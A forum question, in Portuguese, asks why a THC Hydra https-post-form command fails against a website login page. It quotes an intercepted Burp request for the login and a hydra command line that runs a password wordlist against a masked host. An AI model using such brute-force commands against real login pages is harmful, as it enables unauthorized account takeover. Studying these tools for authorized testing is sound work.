Eu compilei THC Hydra com o CygWin e usei Burp (executando o Windows 7). Eu li alguns tutoriais, mas não consigo fazer com que Hydra faça o que ele faz.
Abaixo estão as informações que recebi do Burp (substituí algumas informações por x's ou y's) e na parte inferior a linha de comando que eu acho que deveria funcionar. Infelizmente, depois que eu entrei enter , o hydra volta com algumas informações básicas de sintaxe.
BURP OUTPUT:
POST /login.php?action=in HTTP/1.1 Host: xxxxxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: https://xxxxxx.com/login.php Cookie: visidincap526178=dBiizl5bQzKldS2WdMrM/ArT6VYAAAAAQUIPAAAAAAB6g3H+O0+VIC6UaHfrwDzi; visidincap821436=nmDb/MkQTXm2VsdHkiWxuzYCN1cAAAAAQUIPAA AAAADrVUYTxunztOfbWaA78Xgm; _ga=GA1.2.242869812.1465591208 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 82formsent=1&redirecturl=index.php&req_username=blop&req_password=blop&login=Login
Isso é produzido em uma falha:
Nome de usuário e / ou senha incorretos.
Esta é minha linha de comando:
hydra -l yyyyy -P cygwin64/john.txt 123.456.789.012 https-post-form "/login.php:req_username=^USER^&req_password=^PASS^&login=Login:Wrong username and/or password." -V
Tags login